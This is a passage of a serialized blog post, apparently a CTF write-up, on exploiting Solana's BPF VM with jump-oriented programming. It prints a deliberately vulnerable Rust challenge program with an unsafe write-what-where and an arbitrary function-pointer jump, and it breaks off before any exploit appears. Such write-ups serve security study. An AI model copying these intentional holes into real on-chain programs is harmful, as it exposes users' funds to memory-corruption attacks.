secure.",{"type":28,"tag":2516,"props":40042,"children":40043},{},[40044],{"type":33,"value":2520},{"title":7,"searchDepth":256,"depth":256,"links":40046},[40047,40048,40055,40063],{"id":18619,"depth":256,"text":18622},{"id":35078,"depth":256,"text":35081,"children":40049},[40050,40051,40052,40053,40054],{"id":35089,"depth":293,"text":35092},{"id":35157,"depth":293,"text":35160},{"id":35193,"depth":293,"text":35196},{"id":36587,"depth":293,"text":36590},{"id":36945,"depth":293,"text":36948},{"id":37731,"depth":256,"text":37734,"children":40056},[40057,40058,40059,40060,40061,40062],{"id":37737,"depth":293,"text":37740},{"id":37781,"depth":293,"text":37784},{"id":38683,"depth":293,"text":38686},{"id":5333,"depth":293,"text":5336},{"id":445,"depth":293,"text":448},{"id":39953,"depth":293,"text":39956},{"id":2506,"depth":256,"text":2509},"content:blog:2023-11-01-metamask-snaps.md","blog/2023-11-01-metamask-snaps.md","blog/2023-11-01-metamask-snaps",{"_path":40068,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":40069,"description":40070,"author":40071,"image":40073,"date":40075,"isFeatured":19,"onBlogPage":19,"body":40076,"_type":2534,"_id":45496,"_source":2536,"_file":45497,"_stem":45498,"_extension":2539},"/blog/2023-12-11-jumping-around-in-the-vm","Solana: Jumping Around in the VM","An exploration of low-level Solana VM behavior. How to escalate from a powerful memory corruption primitive to full program control.",[40072,5391],"nicola",{"src":40074},"/posts/jumping-around-in-the-vm/cover.png","2023-12-11",{"type":25,"children":40077,"toc":45485},[40078,40092,40112,40117,40121,40134,40159,40165,40170,40185,40539,40554,40819,40835,41478,41484,41489,41502,41510,41722,41730,42033,42041,42184,42192,42717,42723,42735,42748,42762,42767,43535,43540,43548,43553,43559,43571,43636,43641,43654,43667,43673,43701,44852,44865,44907,44912,44917,44931,45071,45092,45113,45120,45171,45179,45190,45203,45208,45332,45345,45447,45451,45464,45469,45481],{"type":28,"tag":29,"props":40079,"children":40080},{},[40081,40083,40090],{"type":33,"value":40082},"In the world of CTFs, ",{"type":28,"tag":87,"props":40084,"children":40087},{"href":40085,"rel":40086},"https://twitter.com/paradigm_ctf",[91],[40088],{"type":33,"value":40089},"Paradigm CTF 2023",{"type":33,"value":40091}," was like no other. Presenting a unique Solana challenge, the goal was to leverage Jump Oriented Programming, a web2 binary exploitation technique, inside the Solana VM to achieve arbitrary CPI execution.",{"type":28,"tag":29,"props":40093,"children":40094},{},[40095,40097,40104,40105],{"type":33,"value":40096},"To succeed in this challenge, a strong understanding of the Solana VM is required. We've explored parts of the Solana VM internals in two previous blog posts: ",{"type":28,"tag":87,"props":40098,"children":40101},{"href":40099,"rel":40100},"https://osec.io/blog/2022-03-14-solana-security-intro",[91],[40102],{"type":33,"value":40103},"Solana: An Auditor's Introduction",{"type":33,"value":10659},{"type":28,"tag":87,"props":40106,"children":40109},{"href":40107,"rel":40108},"https://osec.io/blog/2022-08-27-reverse-engineering-solana",[91],[40110],{"type":33,"value":40111},"Reverse Engineering Solana with Binary Ninja.\n",{"type":28,"tag":29,"props":40113,"children":40114},{},[40115],{"type":33,"value":40116},"In this comprehensive overview, we'll break down critical components of the Solana BPF VM necessary to write a complete memory-corruption exploit. We then turn an arbitrary function call and memory write primitive into a full exploit.",{"type":28,"tag":63,"props":40118,"children":40119},{"id":18619},[40120],{"type":33,"value":18622},{"type":28,"tag":29,"props":40122,"children":40123},{},[40124,40126,40132],{"type":33,"value":40125},"The challenge itself resides into ",{"type":28,"tag":98,"props":40127,"children":40129},{"className":40128},[],[40130],{"type":33,"value":40131},"framework/",{"type":33,"value":40133},", and is composed of 2 parts:",{"type":28,"tag":2108,"props":40135,"children":40136},{},[40137,40148],{"type":28,"tag":459,"props":40138,"children":40139},{},[40140,40146],{"type":28,"tag":98,"props":40141,"children":40143},{"className":40142},[],[40144],{"type":33,"value":40145},"framework/chall/lib.rs",{"type":33,"value":40147},": The on-chain eBPF program that needs to be exploited.",{"type":28,"tag":459,"props":40149,"children":40150},{},[40151,40157],{"type":28,"tag":98,"props":40152,"children":40154},{"className":40153},[],[40155],{"type":33,"value":40156},"framework/src/main.rs",{"type":33,"value":40158},": Program that setups a solana test environment, gets a single instruction and make it possible to users to interact with the on-chain program.",{"type":28,"tag":75,"props":40160,"children":40162},{"id":40161},"vulnerable-program",[40163],{"type":33,"value":40164},"Vulnerable Program",{"type":28,"tag":29,"props":40166,"children":40167},{},[40168],{"type":33,"value":40169},"The program is simple: it parses the input data and does something based on the first byte. Each potential action is quite out of the ordinary though!",{"type":28,"tag":455,"props":40171,"children":40172},{},[40173],{"type":28,"tag":459,"props":40174,"children":40175},{},[40176,40177,40183],{"type":33,"value":7151},{"type":28,"tag":98,"props":40178,"children":40180},{"className":40179},[],[40181],{"type":33,"value":40182},"data[0] == 0",{"type":33,"value":40184}," a function that lets you write-what-where is executed",{"type":28,"tag":234,"props":40186,"children":40188},{"className":2652,"code":40187,"language":2651,"meta":7,"style":7},"#[inline(never)]\npub fn write(data: &[u8]) {\n    unsafe {\n        let ptr = std::mem::transmute::\u003C[u8; 8], *mut u64>(data[..8].try_into().unwrap());\n        let val = std::mem::transmute::\u003C[u8; 8], u64>(data[8..16].try_into().unwrap());\n        ptr.write_volatile(val);\n    }\n}\n",[40189],{"type":28,"tag":98,"props":40190,"children":40191},{"__ignoreMap":7},[40192,40200,40245,40256,40379,40496,40525,40532],{"type":28,"tag":116,"props":40193,"children":40194},{"class":245,"line":246},[40195],{"type":28,"tag":116,"props":40196,"children":40197},{"style":266},[40198],{"type":33,"value":40199},"#[inline(never)]\n",{"type":28,"tag":116,"props":40201,"children":40202},{"class":245,"line":256},[40203,40207,40211,40216,40220,40224,40228,40232,40236,40240],{"type":28,"tag":116,"props":40204,"children":40205},{"style":376},[40206],{"type":33,"value":13356},{"type":28,"tag":116,"props":40208,"children":40209},{"style":376},[40210],{"type":33,"value":13361},{"type":28,"tag":116,"props":40212,"children":40213},{"style":282},[40214],{"type":33,"value":40215}," write",{"type":28,"tag":116,"props":40217,"children":40218},{"style":266},[40219],{"type":33,"value":313},{"type":28,"tag":116,"props":40221,"children":40222},{"style":272},[40223],{"type":33,"value":3372},{"type":28,"tag":116,"props":40225,"children":40226},{"style":370},[40227],{"type":33,"value":4160},{"type":28,"tag":116,"props":40229,"children":40230},{"style":370},[40231],{"type":33,"value":6813},{"type":28,"tag":116,"props":40233,"children":40234},{"style":266},[40235],{"type":33,"value":347},{"type":28,"tag":116,"props":40237,"children":40238},{"style":339},[40239],{"type":33,"value":3091},{"type":28,"tag":116,"props":40241,"children":40242},{"style":266},[40243],{"type":33,"value":40244},"]) {\n",{"type":28,"tag":116,"props":40246,"children":40247},{"class":245,"line":293},[40248,40252],{"type":28,"tag":116,"props":40249,"children":40250},{"style":376},[40251],{"type":33,"value":13499},{"type":28,"tag":116,"props":40253,"children":40254},{"style":266},[40255],{"type":33,"value":1291},{"type":28,"tag":116,"props":40257,"children":40258},{"class":245,"line":361},[40259,40263,40267,40271,40276,40280,40285,40289,40294,40298,40303,40307,40311,40315,40319,40323,40327,40331,40335,40339,40343,40347,40351,40355,40359,40363,40367,40371,40375],{"type":28,"tag":116,"props":40260,"children":40261},{"style":376},[40262],{"type":33,"value":2736},{"type":28,"tag":116,"props":40264,"children":40265},{"style":272},[40266],{"type":33,"value":13523},{"type":28,"tag":116,"props":40268,"children":40269},{"style":370},[40270],{"type":33,"value":2226},{"type":28,"tag":116,"props":40272,"children":40273},{"style":266},[40274],{"type":33,"value":40275}," std",{"type":28,"tag":116,"props":40277,"children":40278},{"style":370},[40279],{"type":33,"value":3151},{"type":28,"tag":116,"props":40281,"children":40282},{"style":266},[40283],{"type":33,"value":40284},"mem",{"type":28,"tag":116,"props":40286,"children":40287},{"style":370},[40288],{"type":33,"value":3151},{"type":28,"tag":116,"props":40290,"children":40291},{"style":282},[40292],{"type":33,"value":40293},"transmute",{"type":28,"tag":116,"props":40295,"children":40296},{"style":370},[40297],{"type":33,"value":3151},{"type":28,"tag":116,"props":40299,"children":40300},{"style":266},[40301],{"type":33,"value":40302},"\u003C[",{"type":28,"tag":116,"props":40304,"children":40305},{"style":339},[40306],{"type":33,"value":3091},{"type":28,"tag":116,"props":40308,"children":40309},{"style":266},[40310],{"type":33,"value":16888},{"type":28,"tag":116,"props":40312,"children":40313},{"style":350},[40314],{"type":33,"value":3745},{"type":28,"tag":116,"props":40316,"children":40317},{"style":266},[40318],{"type":33,"value":22723},{"type":28,"tag":116,"props":40320,"children":40321},{"style":370},[40322],{"type":33,"value":4240},{"type":28,"tag":116,"props":40324,"children":40325},{"style":376},[40326],{"type":33,"value":3394},{"type":28,"tag":116,"props":40328,"children":40329},{"style":339},[40330],{"type":33,"value":5531},{"type":28,"tag":116,"props":40332,"children":40333},{"style":266},[40334],{"type":33,"value":7282},{"type":28,"tag":116,"props":40336,"children":40337},{"style":272},[40338],{"type":33,"value":3372},{"type":28,"tag":116,"props":40340,"children":40341},{"style":266},[40342],{"type":33,"value":347},{"type":28,"tag":116,"props":40344,"children":40345},{"style":370},[40346],{"type":33,"value":2723},{"type":28,"tag":116,"props":40348,"children":40349},{"style":350},[40350],{"type":33,"value":3745},{"type":28,"tag":116,"props":40352,"children":40353},{"style":266},[40354],{"type":33,"value":15074},{"type":28,"tag":116,"props":40356,"children":40357},{"style":370},[40358],{"type":33,"value":141},{"type":28,"tag":116,"props":40360,"children":40361},{"style":282},[40362],{"type":33,"value":25817},{"type":28,"tag":116,"props":40364,"children":40365},{"style":266},[40366],{"type":33,"value":13545},{"type":28,"tag":116,"props":40368,"children":40369},{"style":370},[40370],{"type":33,"value":141},{"type":28,"tag":116,"props":40372,"children":40373},{"style":282},[40374],{"type":33,"value":3336},{"type":28,"tag":116,"props":40376,"children":40377},{"style":266},[40378],{"type":33,"value":1577},{"type":28,"tag":116,"props":40380,"children":40381},{"class":245,"line":387},[40382,40386,40391,40395,40399,40403,40407,40411,40415,40419,40423,40427,40431,40435,40439,40443,40447,40451,40455,40459,40463,40468,40472,40476,40480,40484,40488,40492],{"type":28,"tag":116,"props":40383,"children":40384},{"style":376},[40385],{"type":33,"value":2736},{"type":28,"tag":116,"props":40387,"children":40388},{"style":272},[40389],{"type":33,"value":40390}," val",{"type":28,"tag":116,"props":40392,"children":40393},{"style":370},[40394],{"type":33,"value":2226},{"type":28,"tag":116,"props":40396,"children":40397},{"style":266},[40398],{"type":33,"value":40275},{"type":28,"tag":116,"props":40400,"children":40401},{"style":370},[40402],{"type":33,"value":3151},{"type":28,"tag":116,"props":40404,"children":40405},{"style":266},[40406],{"type":33,"value":40284},{"type":28,"tag":116,"props":40408,"children":40409},{"style":370},[40410],{"type":33,"value":3151},{"type":28,"tag":116,"props":40412,"children":40413},{"style":282},[40414],{"type":33,"value":40293},{"type":28,"tag":116,"props":40416,"children":40417},{"style":370},[40418],{"type":33,"value":3151},{"type":28,"tag":116,"props":40420,"children":40421},{"style":266},[40422],{"type":33,"value":40302},{"type":28,"tag":116,"props":40424,"children":40425},{"style":339},[40426],{"type":33,"value":3091},{"type":28,"tag":116,"props":40428,"children":40429},{"style":266},[40430],{"type":33,"value":16888},{"type":28,"tag":116,"props":40432,"children":40433},{"style":350},[40434],{"type":33,"value":3745},{"type":28,"tag":116,"props":40436,"children":40437},{"style":266},[40438],{"type":33,"value":22723},{"type":28,"tag":116,"props":40440,"children":40441},{"style":339},[40442],{"type":33,"value":7714},{"type":28,"tag":116,"props":40444,"children":40445},{"style":266},[40446],{"type":33,"value":7282},{"type":28,"tag":116,"props":40448,"children":40449},{"style":272},[40450],{"type":33,"value":3372},{"type":28,"tag":116,"props":40452,"children":40453},{"style":266},[40454],{"type":33,"value":347},{"type":28,"tag":116,"props":40456,"children":40457},{"style":350},[40458],{"type":33,"value":3745},{"type":28,"tag":116,"props":40460,"children":40461},{"style":370},[40462],{"type":33,"value":2723},{"type":28,"tag":116,"props":40464,"children":40465},{"style":350},[40466],{"type":33,"value":40467},"16",{"type":28,"tag":116,"props":40469,"children":40470},{"style":266},[40471],{"type":33,"value":15074},{"type":28,"tag":116,"props":40473,"children":40474},{"style":370},[40475],{"type":33,"value":141},{"type":28,"tag":116,"props":40477,"children":40478},{"style":282},[40479],{"type":33,"value":25817},{"type":28,"tag":116,"props":40481,"children":40482},{"style":266},[40483],{"type":33,"value":13545},{"type":28,"tag":116,"props":40485,"children":40486},{"style":370},[40487],{"type":33,"value":141},{"type":28,"tag":116,"props":40489,"children":40490},{"style":282},[40491],{"type":33,"value":3336},{"type":28,"tag":116,"props":40493,"children":40494},{"style":266},[40495],{"type":33,"value":1577},{"type":28,"tag":116,"props":40497,"children":40498},{"class":245,"line":400},[40499,40504,40508,40513,40517,40521],{"type":28,"tag":116,"props":40500,"children":40501},{"style":272},[40502],{"type":33,"value":40503},"        ptr",{"type":28,"tag":116,"props":40505,"children":40506},{"style":370},[40507],{"type":33,"value":141},{"type":28,"tag":116,"props":40509,"children":40510},{"style":282},[40511],{"type":33,"value":40512},"write_volatile",{"type":28,"tag":116,"props":40514,"children":40515},{"style":266},[40516],{"type":33,"value":313},{"type":28,"tag":116,"props":40518,"children":40519},{"style":272},[40520],{"type":33,"value":12299},{"type":28,"tag":116,"props":40522,"children":40523},{"style":266},[40524],{"type":33,"value":895},{"type":28,"tag":116,"props":40526,"children":40527},{"class":245,"line":614},[40528],{"type":28,"tag":116,"props":40529,"children":40530},{"style":266},[40531],{"type":33,"value":3025},{"type":28,"tag":116,"props":40533,"children":40534},{"class":245,"line":631},[40535],{"type":28,"tag":116,"props":40536,"children":40537},{"style":266},[40538],{"type":33,"value":406},{"type":28,"tag":455,"props":40540,"children":40541},{"start":256},[40542],{"type":28,"tag":459,"props":40543,"children":40544},{},[40545,40546,40552],{"type":33,"value":7151},{"type":28,"tag":98,"props":40547,"children":40549},{"className":40548},[],[40550],{"type":33,"value":40551},"data[0] == 1",{"type":33,"value":40553},", a CPI to a non-existent program is executed:",{"type":28,"tag":234,"props":40555,"children":40557},{"className":2652,"code":40556,"language":2651,"meta":7,"style":7},"#[inline(never)]\npub fn call(data: &[u8]) {\n    let ix = Instruction {\n        program_id: pubkey!(\"osecio5555555555555551111111111111111111111\"),\n        data: data.try_into().unwrap(),\n        accounts: vec![]\n    };\n\n    invoke_signed_unchecked(\n        &ix,\n        &[],\n        &[],\n    ).unwrap();\n}\n",[40558],{"type":28,"tag":98,"props":40559,"children":40560},{"__ignoreMap":7},[40561,40568,40612,40637,40667,40707,40728,40735,40742,40754,40770,40782,40793,40812],{"type":28,"tag":116,"props":40562,"children":40563},{"class":245,"line":246},[40564],{"type":28,"tag":116,"props":40565,"children":40566},{"style":266},[40567],{"type":33,"value":40199},{"type":28,"tag":116,"props":40569,"children":40570},{"class":245,"line":256},[40571,40575,40579,40584,40588,40592,40596,40600,40604,40608],{"type":28,"tag":116,"props":40572,"children":40573},{"style":376},[40574],{"type":33,"value":13356},{"type":28,"tag":116,"props":40576,"children":40577},{"style":376},[40578],{"type":33,"value":13361},{"type":28,"tag":116,"props":40580,"children":40581},{"style":282},[40582],{"type":33,"value":40583}," call",{"type":28,"tag":116,"props":40585,"children":40586},{"style":266},[40587],{"type":33,"value":313},{"type":28,"tag":116,"props":40589,"children":40590},{"style":272},[40591],{"type":33,"value":3372},{"type":28,"tag":116,"props":40593,"children":40594},{"style":370},[40595],{"type":33,"value":4160},{"type":28,"tag":116,"props":40597,"children":40598},{"style":370},[40599],{"type":33,"value":6813},{"type":28,"tag":116,"props":40601,"children":40602},{"style":266},[40603],{"type":33,"value":347},{"type":28,"tag":116,"props":40605,"children":40606},{"style":339},[40607],{"type":33,"value":3091},{"type":28,"tag":116,"props":40609,"children":40610},{"style":266},[40611],{"type":33,"value":40244},{"type":28,"tag":116,"props":40613,"children":40614},{"class":245,"line":293},[40615,40619,40624,40628,40633],{"type":28,"tag":116,"props":40616,"children":40617},{"style":376},[40618],{"type":33,"value":2672},{"type":28,"tag":116,"props":40620,"children":40621},{"style":272},[40622],{"type":33,"value":40623}," ix",{"type":28,"tag":116,"props":40625,"children":40626},{"style":370},[40627],{"type":33,"value":2226},{"type":28,"tag":116,"props":40629,"children":40630},{"style":339},[40631],{"type":33,"value":40632}," Instruction",{"type":28,"tag":116,"props":40634,"children":40635},{"style":266},[40636],{"type":33,"value":1291},{"type":28,"tag":116,"props":40638,"children":40639},{"class":245,"line":361},[40640,40645,40649,40654,40658,40663],{"type":28,"tag":116,"props":40641,"children":40642},{"style":272},[40643],{"type":33,"value":40644},"        program_id",{"type":28,"tag":116,"props":40646,"children":40647},{"style":370},[40648],{"type":33,"value":4160},{"type":28,"tag":116,"props":40650,"children":40651},{"style":282},[40652],{"type":33,"value":40653}," pubkey!",{"type":28,"tag":116,"props":40655,"children":40656},{"style":266},[40657],{"type":33,"value":313},{"type":28,"tag":116,"props":40659,"children":40660},{"style":563},[40661],{"type":33,"value":40662},"\"osecio5555555555555551111111111111111111111\"",{"type":28,"tag":116,"props":40664,"children":40665},{"style":266},[40666],{"type":33,"value":6408},{"type":28,"tag":116,"props":40668,"children":40669},{"class":245,"line":387},[40670,40675,40679,40683,40687,40691,40695,40699,40703],{"type":28,"tag":116,"props":40671,"children":40672},{"style":272},[40673],{"type":33,"value":40674},"        data",{"type":28,"tag":116,"props":40676,"children":40677},{"style":370},[40678],{"type":33,"value":4160},{"type":28,"tag":116,"props":40680,"children":40681},{"style":272},[40682],{"type":33,"value":14768},{"type":28,"tag":116,"props":40684,"children":40685},{"style":370},[40686],{"type":33,"value":141},{"type":28,"tag":116,"props":40688,"children":40689},{"style":282},[40690],{"type":33,"value":25817},{"type":28,"tag":116,"props":40692,"children":40693},{"style":266},[40694],{"type":33,"value":13545},{"type":28,"tag":116,"props":40696,"children":40697},{"style":370},[40698],{"type":33,"value":141},{"type":28,"tag":116,"props":40700,"children":40701},{"style":282},[40702],{"type":33,"value":3336},{"type":28,"tag":116,"props":40704,"children":40705},{"style":266},[40706],{"type":33,"value":3161},{"type":28,"tag":116,"props":40708,"children":40709},{"class":245,"line":400},[40710,40715,40719,40723],{"type":28,"tag":116,"props":40711,"children":40712},{"style":272},[40713],{"type":33,"value":40714},"        accounts",{"type":28,"tag":116,"props":40716,"children":40717},{"style":370},[40718],{"type":33,"value":4160},{"type":28,"tag":116,"props":40720,"children":40721},{"style":282},[40722],{"type":33,"value":3399},{"type":28,"tag":116,"props":40724,"children":40725},{"style":266},[40726],{"type":33,"value":40727},"[]\n",{"type":28,"tag":116,"props":40729,"children":40730},{"class":245,"line":614},[40731],{"type":28,"tag":116,"props":40732,"children":40733},{"style":266},[40734],{"type":33,"value":38618},{"type":28,"tag":116,"props":40736,"children":40737},{"class":245,"line":631},[40738],{"type":28,"tag":116,"props":40739,"children":40740},{"emptyLinePlaceholder":19},[40741],{"type":33,"value":1044},{"type":28,"tag":116,"props":40743,"children":40744},{"class":245,"line":665},[40745,40750],{"type":28,"tag":116,"props":40746,"children":40747},{"style":282},[40748],{"type":33,"value":40749},"    invoke_signed_unchecked",{"type":28,"tag":116,"props":40751,"children":40752},{"style":266},[40753],{"type":33,"value":3133},{"type":28,"tag":116,"props":40755,"children":40756},{"class":245,"line":713},[40757,40761,40766],{"type":28,"tag":116,"props":40758,"children":40759},{"style":370},[40760],{"type":33,"value":3141},{"type":28,"tag":116,"props":40762,"children":40763},{"style":272},[40764],{"type":33,"value":40765},"ix",{"type":28,"tag":116,"props":40767,"children":40768},{"style":266},[40769],{"type":33,"value":3178},{"type":28,"tag":116,"props":40771,"children":40772},{"class":245,"line":750},[40773,40777],{"type":28,"tag":116,"props":40774,"children":40775},{"style":370},[40776],{"type":33,"value":3141},{"type":28,"tag":116,"props":40778,"children":40779},{"style":266},[40780],{"type":33,"value":40781},"[],\n",{"type":28,"tag":116,"props":40783,"children":40784},{"class":245,"line":779},[40785,40789],{"type":28,"tag":116,"props":40786,"children":40787},{"style":370},[40788],{"type":33,"value":3141},{"type":28,"tag":116,"props":40790,"children":40791},{"style":266},[40792],{"type":33,"value":40781},{"type":28,"tag":116,"props":40794,"children":40795},{"class":245,"line":796},[40796,40800,40804,40808],{"type":28,"tag":116,"props":40797,"children":40798},{"style":266},[40799],{"type":33,"value":3327},{"type":28,"tag":116,"props":40801,"children":40802},{"style":370},[40803],{"type":33,"value":141},{"type":28,"tag":116,"props":40805,"children":40806},{"style":282},[40807],{"type":33,"value":3336},{"type":28,"tag":116,"props":40809,"children":40810},{"style":266},[40811],{"type":33,"value":1445},{"type":28,"tag":116,"props":40813,"children":40814},{"class":245,"line":847},[40815],{"type":28,"tag":116,"props":40816,"children":40817},{"style":266},[40818],{"type":33,"value":406},{"type":28,"tag":455,"props":40820,"children":40821},{"start":293},[40822],{"type":28,"tag":459,"props":40823,"children":40824},{},[40825,40827,40833],{"type":33,"value":40826},"Finally, if ",{"type":28,"tag":98,"props":40828,"children":40830},{"className":40829},[],[40831],{"type":33,"value":40832},"data[0]",{"type":33,"value":40834}," is neither 0 nor 1, a function that lets you jump to an arbitrary address, passing an arbitrary value as the first parameter is executed:",{"type":28,"tag":234,"props":40836,"children":40838},{"className":2652,"code":40837,"language":2651,"meta":7,"style":7},"#[inline(never)]\npub fn process(mut data: &[u8]) {\n    unsafe {\n        let ptr = std::mem::transmute::\u003C[u8; 8], fn(u64)>(data[..8].try_into().unwrap());\n        let val = std::mem::transmute::\u003C[u8; 8], u64>(data[8..16].try_into().unwrap());\n        ptr(val);\n\n        data = &data[16..];\n\n        let ptr = std::mem::transmute::\u003C[u8; 8], fn(u64)>(data[..8].try_into().unwrap());\n        let val = std::mem::transmute::\u003C[u8; 8], u64>(data[8..16].try_into().unwrap());\n        ptr(val);\n    }\n}\n",[40839],{"type":28,"tag":98,"props":40840,"children":40841},{"__ignoreMap":7},[40842,40849,40897,40908,41028,41143,41162,41169,41204,41211,41330,41445,41464,41471],{"type":28,"tag":116,"props":40843,"children":40844},{"class":245,"line":246},[40845],{"type":28,"tag":116,"props":40846,"children":40847},{"style":266},[40848],{"type":33,"value":40199},{"type":28,"tag":116,"props":40850,"children":40851},{"class":245,"line":256},[40852,40856,40860,40865,40869,40873,40877,40881,40885,40889,40893],{"type":28,"tag":116,"props":40853,"children":40854},{"style":376},[40855],{"type":33,"value":13356},{"type":28,"tag":116,"props":40857,"children":40858},{"style":376},[40859],{"type":33,"value":13361},{"type":28,"tag":116,"props":40861,"children":40862},{"style":282},[40863],{"type":33,"value":40864}," process",{"type":28,"tag":116,"props":40866,"children":40867},{"style":266},[40868],{"type":33,"value":313},{"type":28,"tag":116,"props":40870,"children":40871},{"style":376},[40872],{"type":33,"value":3394},{"type":28,"tag":116,"props":40874,"children":40875},{"style":272},[40876],{"type":33,"value":14768},{"type":28,"tag":116,"props":40878,"children":40879},{"style":370},[40880],{"type":33,"value":4160},{"type":28,"tag":116,"props":40882,"children":40883},{"style":370},[40884],{"type":33,"value":6813},{"type":28,"tag":116,"props":40886,"children":40887},{"style":266},[40888],{"type":33,"value":347},{"type":28,"tag":116,"props":40890,"children":40891},{"style":339},[40892],{"type":33,"value":3091},{"type":28,"tag":116,"props":40894,"children":40895},{"style":266},[40896],{"type":33,"value":40244},{"type":28,"tag":116,"props":40898,"children":40899},{"class":245,"line":293},[40900,40904],{"type":28,"tag":116,"props":40901,"children":40902},{"style":376},[40903],{"type":33,"value":13499},{"type":28,"tag":116,"props":40905,"children":40906},{"style":266},[40907],{"type":33,"value":1291},{"type":28,"tag":116,"props":40909,"children":40910},{"class":245,"line":361},[40911,40915,40919,40923,40927,40931,40935,40939,40943,40947,40951,40955,40959,40963,40967,40971,40975,40979,40984,40988,40992,40996,41000,41004,41008,41012,41016,41020,41024],{"type":28,"tag":116,"props":40912,"children":40913},{"style":376},[40914],{"type":33,"value":2736},{"type":28,"tag":116,"props":40916,"children":40917},{"style":272},[40918],{"type":33,"value":13523},{"type":28,"tag":116,"props":40920,"children":40921},{"style":370},[40922],{"type":33,"value":2226},{"type":28,"tag":116,"props":40924,"children":40925},{"style":266},[40926],{"type":33,"value":40275},{"type":28,"tag":116,"props":40928,"children":40929},{"style":370},[40930],{"type":33,"value":3151},{"type":28,"tag":116,"props":40932,"children":40933},{"style":266},[40934],{"type":33,"value":40284},{"type":28,"tag":116,"props":40936,"children":40937},{"style":370},[40938],{"type":33,"value":3151},{"type":28,"tag":116,"props":40940,"children":40941},{"style":282},[40942],{"type":33,"value":40293},{"type":28,"tag":116,"props":40944,"children":40945},{"style":370},[40946],{"type":33,"value":3151},{"type":28,"tag":116,"props":40948,"children":40949},{"style":266},[40950],{"type":33,"value":40302},{"type":28,"tag":116,"props":40952,"children":40953},{"style":339},[40954],{"type":33,"value":3091},{"type":28,"tag":116,"props":40956,"children":40957},{"style":266},[40958],{"type":33,"value":16888},{"type":28,"tag":116,"props":40960,"children":40961},{"style":350},[40962],{"type":33,"value":3745},{"type":28,"tag":116,"props":40964,"children":40965},{"style":266},[40966],{"type":33,"value":22723},{"type":28,"tag":116,"props":40968,"children":40969},{"style":376},[40970],{"type":33,"value":19930},{"type":28,"tag":116,"props":40972,"children":40973},{"style":266},[40974],{"type":33,"value":313},{"type":28,"tag":116,"props":40976,"children":40977},{"style":339},[40978],{"type":33,"value":7714},{"type":28,"tag":116,"props":40980,"children":40981},{"style":266},[40982],{"type":33,"value":40983},")>(",{"type":28,"tag":116,"props":40985,"children":40986},{"style":272},[40987],{"type":33,"value":3372},{"type":28,"tag":116,"props":40989,"children":40990},{"style":266},[40991],{"type":33,"value":347},{"type":28,"tag":116,"props":40993,"children":40994},{"style":370},[40995],{"type":33,"value":2723},{"type":28,"tag":116,"props":40997,"children":40998},{"style":350},[40999],{"type":33,"value":3745},{"type":28,"tag":116,"props":41001,"children":41002},{"style":266},[41003],{"type":33,"value":15074},{"type":28,"tag":116,"props":41005,"children":41006},{"style":370},[41007],{"type":33,"value":141},{"type":28,"tag":116,"props":41009,"children":41010},{"style":282},[41011],{"type":33,"value":25817},{"type":28,"tag":116,"props":41013,"children":41014},{"style":266},[41015],{"type":33,"value":13545},{"type":28,"tag":116,"props":41017,"children":41018},{"style":370},[41019],{"type":33,"value":141},{"type":28,"tag":116,"props":41021,"children":41022},{"style":282},[41023],{"type":33,"value":3336},{"type":28,"tag":116,"props":41025,"children":41026},{"style":266},[41027],{"type":33,"value":1577},{"type":28,"tag":116,"props":41029,"children":41030},{"class":245,"line":387},[41031,41035,41039,41043,41047,41051,41055,41059,41063,41067,41071,41075,41079,41083,41087,41091,41095,41099,41103,41107,41111,41115,41119,41123,41127,41131,41135,41139],{"type":28,"tag":116,"props":41032,"children":41033},{"style":376},[41034],{"type":33,"value":2736},{"type":28,"tag":116,"props":41036,"children":41037},{"style":272},[41038],{"type":33,"value":40390},{"type":28,"tag":116,"props":41040,"children":41041},{"style":370},[41042],{"type":33,"value":2226},{"type":28,"tag":116,"props":41044,"children":41045},{"style":266},[41046],{"type":33,"value":40275},{"type":28,"tag":116,"props":41048,"children":41049},{"style":370},[41050],{"type":33,"value":3151},{"type":28,"tag":116,"props":41052,"children":41053},{"style":266},[41054],{"type":33,"value":40284},{"type":28,"tag":116,"props":41056,"children":41057},{"style":370},[41058],{"type":33,"value":3151},{"type":28,"tag":116,"props":41060,"children":41061},{"style":282},[41062],{"type":33,"value":40293},{"type":28,"tag":116,"props":41064,"children":41065},{"style":370},[41066],{"type":33,"value":3151},{"type":28,"tag":116,"props":41068,"children":41069},{"style":266},[41070],{"type":33,"value":40302},{"type":28,"tag":116,"props":41072,"children":41073},{"style":339},[41074],{"type":33,"value":3091},{"type":28,"tag":116,"props":41076,"children":41077},{"style":266},[41078],{"type":33,"value":16888},{"type":28,"tag":116,"props":41080,"children":41081},{"style":350},[41082],{"type":33,"value":3745},{"type":28,"tag":116,"props":41084,"children":41085},{"style":266},[41086],{"type":33,"value":22723},{"type":28,"tag":116,"props":41088,"children":41089},{"style":339},[41090],{"type":33,"value":7714},{"type":28,"tag":116,"props":41092,"children":41093},{"style":266},[41094],{"type":33,"value":7282},{"type":28,"tag":116,"props":41096,"children":41097},{"style":272},[41098],{"type":33,"value":3372},{"type":28,"tag":116,"props":41100,"children":41101},{"style":266},[41102],{"type":33,"value":347},{"type":28,"tag":116,"props":41104,"children":41105},{"style":350},[41106],{"type":33,"value":3745},{"type":28,"tag":116,"props":41108,"children":41109},{"style":370},[41110],{"type":33,"value":2723},{"type":28,"tag":116,"props":41112,"children":41113},{"style":350},[41114],{"type":33,"value":40467},{"type":28,"tag":116,"props":41116,"children":41117},{"style":266},[41118],{"type":33,"value":15074},{"type":28,"tag":116,"props":41120,"children":41121},{"style":370},[41122],{"type":33,"value":141},{"type":28,"tag":116,"props":41124,"children":41125},{"style":282},[41126],{"type":33,"value":25817},{"type":28,"tag":116,"props":41128,"children":41129},{"style":266},[41130],{"type":33,"value":13545},{"type":28,"tag":116,"props":41132,"children":41133},{"style":370},[41134],{"type":33,"value":141},{"type":28,"tag":116,"props":41136,"children":41137},{"style":282},[41138],{"type":33,"value":3336},{"type":28,"tag":116,"props":41140,"children":41141},{"style":266},[41142],{"type":33,"value":1577},{"type":28,"tag":116,"props":41144,"children":41145},{"class":245,"line":400},[41146,41150,41154,41158],{"type":28,"tag":116,"props":41147,"children":41148},{"style":282},[41149],{"type":33,"value":40503},{"type":28,"tag":116,"props":41151,"children":41152},{"style":266},[41153],{"type":33,"value":313},{"type":28,"tag":116,"props":41155,"children":41156},{"style":272},[41157],{"type":33,"value":12299},{"type":28,"tag":116,"props":41159,"children":41160},{"style":266},[41161],{"type":33,"value":895},{"type":28,"tag":116,"props":41163,"children":41164},{"class":245,"line":614},[41165],{"type":28,"tag":116,"props":41166,"children":41167},{"emptyLinePlaceholder":1